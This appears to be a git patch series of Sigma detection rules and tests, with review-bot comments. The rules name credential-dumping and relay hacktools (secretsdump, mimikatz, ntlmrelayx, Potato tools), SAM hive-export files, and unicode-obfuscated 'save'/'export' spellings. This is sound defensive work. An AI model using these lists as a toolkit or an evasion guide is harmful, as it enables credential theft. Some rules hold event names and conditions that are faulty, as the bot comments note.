@@ -304,7 +335,11 @@ class TestRules(unittest.TestCase): def test_optional_status(self): faulty_rules = [] - valid_status = ["stable","test","experimental"] + valid_status = [ + "stable", + "test", + "experimental", + ] for file in self.yield_next_rule_file_path(self.path_to_rules): status_str = self.get_rule_part(file_path=file, part_name="status") if status_str: @@ -317,7 +352,13 @@ class TestRules(unittest.TestCase): def test_level(self): faulty_rules = [] - valid_level = ["informational","low","medium","high","critical"] + valid_level = [ + "informational", + "low", + "medium", + "high", + "critical", + ] for file in self.yield_next_rule_file_path(self.path_to_rules): level_str = self.get_rule_part(file_path=file, part_name="level") if not level_str: 
@@ -330,6 +371,32 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_optional_fields(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + fields_str = self.get_rule_part(file_path=file, part_name="fields") + if fields_str: + # it exists but isn't a list + if not isinstance(fields_str, list): + print(Fore.YELLOW + "Rule {} has a 'fields' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'fields' fields. (has to be a list of values even if it contains only a single value)") + + def test_optional_falsepositives(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + falsepositives_str = self.get_rule_part(file_path=file, part_name="falsepositives") + if falsepositives_str: + # it exists but isn't a list + if not isinstance(falsepositives_str, list): + print(Fore.YELLOW + "Rule {} has a 'falsepositives' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 07223baaebed2d5c894ba2c503fd43b3e6dcb253 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 10:22:07 +0200 Subject: [PATCH 0069/1367] fix: typo in date value --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 46461579..fa6e4b36 100644 
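Review bot: `test_optional_fields` and `test_optional_falsepositives` are byte-for-byte copies that differ only in the part name and message, so the next optional list field will be a third copy; a small helper that takes the part name keeps the two tests to one line each and makes the "must be a list" rule live in one place. Note that `if fields_str:` also lets an explicitly empty `fields:` (parsed as `None`) through silently, which is probably intended but is worth a comment such as `# empty/absent optional field is fine; only a present non-list value is an error`. The rewritten tests would look like this:
```python
def _check_optional_list(self, part_name):
    # Shared check for optional rule parts that must be a list when present.
    faulty_rules = []
    for file in self.yield_next_rule_file_path(self.path_to_rules):
        value = self.get_rule_part(file_path=file, part_name=part_name)
        # empty/absent optional field is fine; only a present non-list value is an error
        if value and not isinstance(value, list):
            print(Fore.YELLOW + "Rule {} has a '{}' field that isn't a list.".format(file, part_name))
            faulty_rules.append(file)
    return faulty_rules

def test_optional_fields(self):
    faulty_rules = self._check_optional_list("fields")
    self.assertEqual(faulty_rules, [], Fore.RED +
        "There are rules with malformed optional 'fields' fields. (has to be a list of values even if it contains only a single value)")

def test_optional_falsepositives(self):
    faulty_rules = self._check_optional_list("falsepositives")
    self.assertEqual(faulty_rules, [], Fore.RED +
        "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)")
```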
--- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -3,7 +3,7 @@ id: 6ea858a8-ba71-4a12-b2cc-5d83312404c7 status: experimental description: Detects files written by the different tools that exploit HiveNightmare author: Florian Roth -date: 2020/07/23 +date: 2021/07/23 references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ From 3eb37c014c3f1ec01cd2a84a28321c5a5509a49c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 11:08:35 +0200 Subject: [PATCH 0070/1367] rule: Impacket tools and Relay attack tools --- .../win_impacket_compiled_tools.yml | 71 +++++++++++++++++++ .../win_tools_relay_attacks.yml | 44 ++++++++++++ 2 files changed, 115 insertions(+) create mode 100644 rules/windows/process_creation/win_impacket_compiled_tools.yml create mode 100644 rules/windows/process_creation/win_tools_relay_attacks.yml diff --git a/rules/windows/process_creation/win_impacket_compiled_tools.yml b/rules/windows/process_creation/win_impacket_compiled_tools.yml new file mode 100644 index 00000000..d31c4270 --- /dev/null +++ b/rules/windows/process_creation/win_impacket_compiled_tools.yml 
@@ -0,0 +1,71 @@ +title: Impacket Tool Execution +id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 +description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) +author: Florian Roth +date: 2021/07/24 +references: + - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries +tags: + - attack.execution + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection: + - Image|contains: + - '\goldenPac' + - '\karmaSMB' + - '\kintercept' + - '\ntlmrelayx' + - '\rpcdump' + - '\samrdump' + - '\secretsdump' + - '\smbexec' + - '\smbrelayx' + - '\wmiexec' + - '\wmipersist' + - Image|endswith: + # - '\addcomputer_windows.exe' + - '\atexec_windows.exe' + - '\dcomexec_windows.exe' + - '\dpapi_windows.exe' + # - '\esentutl_windows.exe' + - '\findDelegation_windows.exe' + - '\GetADUsers_windows.exe' + # - '\getArch_windows.exe' + - '\GetNPUsers_windows.exe' + - '\getPac_windows.exe' + - '\getST_windows.exe' + - '\getTGT_windows.exe' + - '\GetUserSPNs_windows.exe' + - '\ifmap_windows.exe' + # - '\lookupsid_windows.exe' + - '\mimikatz_windows.exe' + # - '\mqtt_check_windows.exe' + # - '\mssqlclient_windows.exe' + # - '\mssqlinstance_windows.exe' + - '\netview_windows.exe' + - '\nmapAnswerMachine_windows.exe' + #- '\ntfs-read_windows.exe' + - '\opdump_windows.exe' + # - '\ping6_windows.exe' + # - '\ping_windows.exe' + - '\psexec_windows.exe' + # - '\raiseChild_windows.exe' + - '\rdp_check_windows.exe' + #- '\registry-read_windows.exe' + #- '\reg_windows.exe' + - '\sambaPipe_windows.exe' + # - '\services_windows.exe' + - '\smbclient_windows.exe' + - '\smbserver_windows.exe' + - '\sniffer_windows.exe' + - '\sniff_windows.exe' + - '\split_windows.exe' + - '\ticketer_windows.exe' + # - '\wmiquery_windows.exe' + condition: selection +falsepositives: + - Legitimate use of the impacket tools +level: high 
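Review bot: The whole rule is tagged `attack.t1557.001` (adversary-in-the-middle via LLMNR/NBT-NS poisoning and SMB relay), but that technique only fits `ntlmrelayx`/`smbrelayx`; the remote-execution binaries (`psexec`, `smbexec`, `wmiexec`, `atexec`, `dcomexec`) correspond to T1021.002/T1047 and `secretsdump` to T1003, so either the tag list should carry those techniques or the list should be split per tool family. The many commented-out `Image|endswith` entries (`esentutl`, `reg`, `services`, `ping`, ...) have no explanation; a one-line comment at the top of that list such as `# entries below are disabled because the names are too generic and would cause false positives` tells the next maintainer why they must stay off. The `Image|contains` values without an extension (e.g. `'\rpcdump'`) match any path component starting with that string, which the description already concedes, so a note on the expected false-positive sources under `falsepositives` would help tuning.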
diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml new file mode 100644 index 00000000..9b435d13 --- /dev/null +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -0,0 +1,44 @@ +title: SMB Relay Attack Tools +id: 5589ab4f-a767-433c-961d-c91f3f704db1 +description: Detects different hacktools used for relay attacks on Windows for privilege escalation +author: Florian Roth +date: 2021/07/24 +references: + - https://attack.mitre.org/techniques/T1557/001/ + - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ + - https://pentestlab.blog/2017/04/13/hot-potato/ + - https://github.com/ohpe/juicy-potato + - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes + - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire +tags: + - attack.execution + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection_pe: + Image|contains: + - 'PetitPotam' + - 'RottenPotato' + - 'HotPotato' + - 'JuicyPotato' + - '\just_dce_' + - 'Juicy Potato' + - '\temp\rot.exe' + - '\Potato.exe' + - '\SpoolSample.exe' + - '\Responder.exe' + - '\smbrelayx' + - '\ntlmrelayx' + selection_script: + CommandLine|contains: + - 'Invoke-Tater' + - ' smbrelay' + - ' ntlmrelay' + - 'cme smb ' + - ' /ntlm:NTLMhash ' + condition: selection_pe or selection_script +falsepositives: + - Legitimate files with these rare hacktool names +level: critical From ae80f747aed11a9247c282ac7b999f370a54a650 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 12:34:33 +0200 Subject: [PATCH 0071/1367] fix: adding experimental status --- rules/windows/process_creation/win_impacket_compiled_tools.yml | 1 + rules/windows/process_creation/win_tools_relay_attacks.yml | 1 + 2 files changed, 2 insertions(+) 
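Review bot: The description says these tools are used for privilege escalation, yet the tags carry only `attack.execution` and `attack.t1557.001`; the Potato family performs local token impersonation rather than SMB relay, so `attack.privilege_escalation` (and a T1134-family technique, if the maintainers agree) would keep the tags consistent with the description. The `CommandLine|contains` value `' /ntlm:NTLMhash '` is the placeholder used in tool documentation rather than a value an operator would pass, so it mostly fires on copy-pasted examples; it is worth a comment stating that, or dropping it. `'cme smb '` is a short token that unrelated command lines can contain, which, together with the name-only `Image|contains` logic, argues for documenting the expected noise under `falsepositives` given `level: critical`.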
diff --git a/rules/windows/process_creation/win_impacket_compiled_tools.yml b/rules/windows/process_creation/win_impacket_compiled_tools.yml index d31c4270..9eb0aefd 100644 --- a/rules/windows/process_creation/win_impacket_compiled_tools.yml +++ b/rules/windows/process_creation/win_impacket_compiled_tools.yml @@ -1,4 +1,5 @@ title: Impacket Tool Execution +status: experimental id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) author: Florian Roth diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml index 9b435d13..89ce6ef1 100644 --- a/rules/windows/process_creation/win_tools_relay_attacks.yml +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -1,4 +1,5 @@ title: SMB Relay Attack Tools +status: experimental id: 5589ab4f-a767-433c-961d-c91f3f704db1 description: Detects different hacktools used for relay attacks on Windows for privilege escalation author: Florian Roth From 9771943116378adfa7a1801d3df47b6a96afa970 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 16:13:36 +0200 Subject: [PATCH 0072/1367] refactor: new file pattern SeriousSAM --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index fa6e4b36..42bb5ee0 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml 
@@ -8,6 +8,7 @@ references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare + - https://twitter.com/cube0x0/status/1418920190759378944 logsource: product: windows category: file_event @@ -17,12 +18,14 @@ tags: - attack.t1552.001 detection: selection: - TargetFilename|contains: + - TargetFilename|contains: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version - '\SAM-2022-' # C++ version - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version + - TargetFilename: + - 'C:\windows\temp\sam' condition: selection fields: - CommandLine From e5edd03ff38d4eaa3efb363678f9fdb23c78df90 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:16:11 -0500 Subject: [PATCH 0073/1367] Create aws_elasticache_security_group_created.yml --- ...aws_elasticache_security_group_created.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/aws_elasticache_security_group_created.yml diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml new file mode 100644 index 00000000..494774ea --- /dev/null +++ b/rules/cloud/aws_elasticache_security_group_created.yml 
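Review bot: The new exact-match alternative `TargetFilename: 'C:\windows\temp\sam'` assumes the system drive is `C:` and, on backends where plain equality is case-sensitive, the exact casing `windows\temp`; `TargetFilename|endswith: '\windows\temp\sam'` covers the same export location without either assumption. Turning `selection` into a list of two maps makes the two alternatives OR-ed, which matches the intent but is easy to misread next to the `|contains` list above it; a comment such as `# either map matches` on the first list item would make it explicit.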
@@ -0,0 +1,25 @@ +title: AWS ElastiCache Security Group Created +id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 +description: Detects when an ElastiCache security group has been created. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: elasticache.amazonaws.com + selection_eventname: + - eventName: "Create Cache Security Group" + condition: all of them +level: low +tags: + - attack.persistence + - attack.t1136 + - attack.t1136.003 +falsepositives: +- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + From 8816cb3345bc154567cbe19f0c4965fc06716127 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:23:25 -0500 Subject: [PATCH 0074/1367] Create aws_elasticache_security_group_modified_or_deleted.yml --- ...che_security_group_modified_or_deleted.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml new file mode 100644 index 00000000..80f9578b --- /dev/null +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml 
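Review bot: `eventName: "Create Cache Security Group"` is written with spaces, but CloudTrail records the API action name without them (the sibling rule in the next commit uses that form for `AuthorizeCacheSecurityGroupEgress`), so this selection will not match; `- eventName: CreateCacheSecurityGroup` is the value to compare against, and the referenced Elastic rule can be checked to confirm it. The `falsepositives` list item starts at column 0 and the file ends with two blank lines, which the project's YAML checks may reject. "A ElastiCache security group" should read "An ElastiCache security group".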
@@ -0,0 +1,32 @@ +title: AWS ElastiCache Security Group Modified or Deleted +id: 7c797da2-9cf2-4523-ba64-33b06339f0cc +description: Identifies when an ElastiCache security group has been modified or deleted. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: elasticache.amazonaws.com + selection_eventname1: + - eventName: "Delete Cache Security Group" + selection_eventname2: + - eventName: "Authorize Cache Security Group Ingress" + selection_eventname3: + - eventName: "Revoke Cache Security Group Ingress" + selection_eventname4: + - eventName: "AuthorizeCacheSecurityGroupEgress" + selection_eventname5: + - eventName: "RevokeCacheSecurityGroupEgress" + condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 +level: low +tags: + - attack.impact + - attack.t1531 +falsepositives: +- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + From 5d3b687ce4e84c7c6b8162dcf82b62d43be73a6c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:34:08 -0500 Subject: [PATCH 0075/1367] Update aws_elasticache_security_group_created.yml --- rules/cloud/aws_elasticache_security_group_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
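Review bot: The condition `selection_source and selection_eventname1 or selection_eventname2 or ...` binds `and` tighter than `or`, so `selection_eventname2` through `5` match without the `eventSource` restriction and any service emitting one of those names triggers the rule; `condition: selection_source and 1 of selection_eventname*` expresses the intent. Three of the five `eventName` values use spaces (`"Delete Cache Security Group"`, `"Authorize Cache Security Group Ingress"`, `"Revoke Cache Security Group Ingress"`) while the other two use the API form (`AuthorizeCacheSecurityGroupEgress`); CloudTrail uses the latter, so the spaced values will not match and the five selections can collapse into one `eventName` list. "A ElastiCache security group deletion" should read "An ElastiCache security group deletion".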
diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml index 494774ea..c0df4df4 100644 --- a/rules/cloud/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws_elasticache_security_group_created.yml @@ -18,7 +18,7 @@ level: low tags: - attack.persistence - attack.t1136 - - attack.t1136.003 + - attack.t1136.003 falsepositives: - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 55a2af475be01eaf039306bb9bdf4489a271eaae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:35:05 -0500 Subject: [PATCH 0076/1367] Update aws_elasticache_security_group_modified_or_deleted.yml --- .../aws_elasticache_security_group_modified_or_deleted.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml index 80f9578b..eab2a71a 100644 --- a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml 
@@ -16,11 +16,11 @@ detection: selection_eventname2: - eventName: "Authorize Cache Security Group Ingress" selection_eventname3: - - eventName: "Revoke Cache Security Group Ingress" + - eventName: "Revoke Cache Security Group Ingress" selection_eventname4: - - eventName: "AuthorizeCacheSecurityGroupEgress" + - eventName: "AuthorizeCacheSecurityGroupEgress" selection_eventname5: - - eventName: "RevokeCacheSecurityGroupEgress" + - eventName: "RevokeCacheSecurityGroupEgress" condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 level: low tags: From 7c6b13936d6909b72f2d06a8f52e15d87951b9fe Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:20:11 -0500 Subject: [PATCH 0077/1367] Create azure_kubernetes_events_deleted.yml --- .../cloud/azure_kubernetes_events_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_events_deleted.yml diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml new file mode 100644 index 00000000..aa209c99 --- /dev/null +++ b/rules/cloud/azure_kubernetes_events_deleted.yml 
@@ -0,0 +1,24 @@ +title: Azure Kubernetes Events Deleted +id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +logsource: + service: azure.activitylogs +detection: + selection_operationname: + - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + status: success + condition: all of them +level: medium +tags: + - attack.defense_evasion + - attack.t1562 + - attack.t1562.001 +falsepositives: +- Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From 046053644491653edf4e978f0cf592072b087ce0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:24:29 -0500 Subject: [PATCH 0078/1367] Create azure_kubernetes_pods_delete.yml --- rules/cloud/azure_kubernetes_pods_delete.yml | 21 ++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_pods_delete.yml diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_delete.yml new file mode 100644 index 00000000..a4d8a5bb --- /dev/null +++ b/rules/cloud/azure_kubernetes_pods_delete.yml 
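Review bot: The operation name is matched on `properties.message`, while the referenced Elastic rule keys on the activity-log operation name field; please confirm against the `azure.activitylogs` field mapping that this backend surfaces the operation name there, because a wrong field name never matches and gives no error (the pods rule in the following commit shares the same field choice). The two-key list item `- properties.message: ... status: success` is easy to misread as two separate items; a plain map under `selection_operationname` or a comment `# both keys must match on the same event` would remove the ambiguity. `attack.t1562.001` (disable or modify tools) is a loose fit for deleting events; T1070 (indicator removal) may describe the behaviour more precisely.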
@@ -0,0 +1,21 @@
+title: Azure Kubernetes Pods Deleted
+id: b02f9591-12c3-4965-986a-88028629b2e1
+description: Identifies the deletion of Azure Kubernetes Pods.
+author: Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
+ - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
+logsource:
+ service: azure.activitylogs
+detection:
+ selection_operation_name:
+ - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE
+ status: success
+ condition: all of them
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From c366ae4b2a5078bfd008313889d0b5f5360aec6c Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:25:37 -0500
Subject: [PATCH 0079/1367] Update azure_kubernetes_pods_delete.yml
---
rules/cloud/azure_kubernetes_pods_delete.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_delete.yml
index a4d8a5bb..86097c0b 100644
--- a/rules/cloud/azure_kubernetes_pods_delete.yml
+++ b/rules/cloud/azure_kubernetes_pods_delete.yml
@@ -6,7 +6,7 @@ status: experimental
date: 2021/07/24
references:
- https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
+ - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
logsource:
service: azure.activitylogs
detection:
From 5fc36eb8d6f7e6c70ba4c72e506082122e2aa33f Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:25:51 -0500
Subject: [PATCH 0080/1367] Rename azure_kubernetes_pods_delete.yml to azure_kubernetes_pods_deleted.yml
---
...bernetes_pods_delete.yml => azure_kubernetes_pods_deleted.yml} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename rules/cloud/{azure_kubernetes_pods_delete.yml => azure_kubernetes_pods_deleted.yml} (100%)
diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml
similarity index 100%
rename from rules/cloud/azure_kubernetes_pods_delete.yml
rename to rules/cloud/azure_kubernetes_pods_deleted.yml
From ef64e2a02f14ed43e9544b5a96301d01bbf99898 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:28:09 -0500
Subject: [PATCH 0081/1367] Update azure_kubernetes_events_deleted.yml
---
rules/cloud/azure_kubernetes_events_deleted.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml
index aa209c99..586761a0 100644
--- a/rules/cloud/azure_kubernetes_events_deleted.yml
+++ b/rules/cloud/azure_kubernetes_events_deleted.yml
@@ -6,7 +6,7 @@ status: experimental
date: 2021/07/24
references:
- https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
+ - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
logsource:
service: azure.activitylogs
detection:
From 0445be8d01c596caa210bee0f9fcabae07ce4fe0 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:28:21 -0500
Subject: [PATCH 0082/1367] Update azure_kubernetes_events_deleted.yml
---
rules/cloud/azure_kubernetes_events_deleted.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml
index 586761a0..68a160c4 100644
--- a/rules/cloud/azure_kubernetes_events_deleted.yml
+++ b/rules/cloud/azure_kubernetes_events_deleted.yml
@@ -18,7 +18,7 @@ level: medium
tags:
- attack.defense_evasion
- attack.t1562
- - attack.t1562.001
+ - attack.t1562.001
falsepositives:
- Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 152951f171cb77905a5da29de69927b0c15c4d7e Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:32:19 -0500
Subject: [PATCH 0083/1367] Update azure_kubernetes_pods_deleted.yml
---
rules/cloud/azure_kubernetes_pods_deleted.yml | 1 -
1 file changed, 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml
index 86097c0b..77916784 100644
--- a/rules/cloud/azure_kubernetes_pods_deleted.yml
+++ b/rules/cloud/azure_kubernetes_pods_deleted.yml
@@ -12,7 +12,6 @@ logsource:
detection:
selection_operation_name:
- properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE
- status: success
condition: all of them
level: medium
tags:
From e123635c42410535760a47836d478f749b7c95eb Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:32:27 -0500
Subject: [PATCH 0084/1367] Update azure_kubernetes_events_deleted.yml
---
rules/cloud/azure_kubernetes_events_deleted.yml | 1 -
1 file changed, 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml
index 68a160c4..4693d487 100644
--- a/rules/cloud/azure_kubernetes_events_deleted.yml
+++ b/rules/cloud/azure_kubernetes_events_deleted.yml
@@ -12,7 +12,6 @@ logsource:
detection:
selection_operationname:
- properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE
- status: success
condition: all of them
level: medium
tags:
From da6e7475479a986b3c95c07884d10f7ce48cdf1d Mon Sep 17 00:00:00 2001
From: John Lambert
Date: Sat, 24 Jul 2021 10:33:15 -0500
Subject: [PATCH 0085/1367] cover evasions from unicode substitutions
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Add variations to cover unicode substitutions to avoid evasion.
> Unicode contains a range for Spacing Modifier Letters (0x02B0 - 0x02FF) [4], which includes characters such as ˪, ˣ and ˢ. Some command-line parsers recognise these as letters and convert them back to l, x and s respectively.
See (https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation) by @Wietze
---
.../win_grabbing_sensitive_hives_via_reg.yml | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
index a0ae78a1..2ea66c74 100644
--- a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
+++ b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
@@ -7,6 +7,7 @@ references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md
+ - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
tags:
- attack.credential_access
- attack.t1003.002
@@ -23,15 +24,25 @@ detection:
CommandLine|contains:
- 'save'
- 'export'
+ - 'ˢave'
+ - 'eˣport'
selection_2:
CommandLine|contains:
- 'hklm'
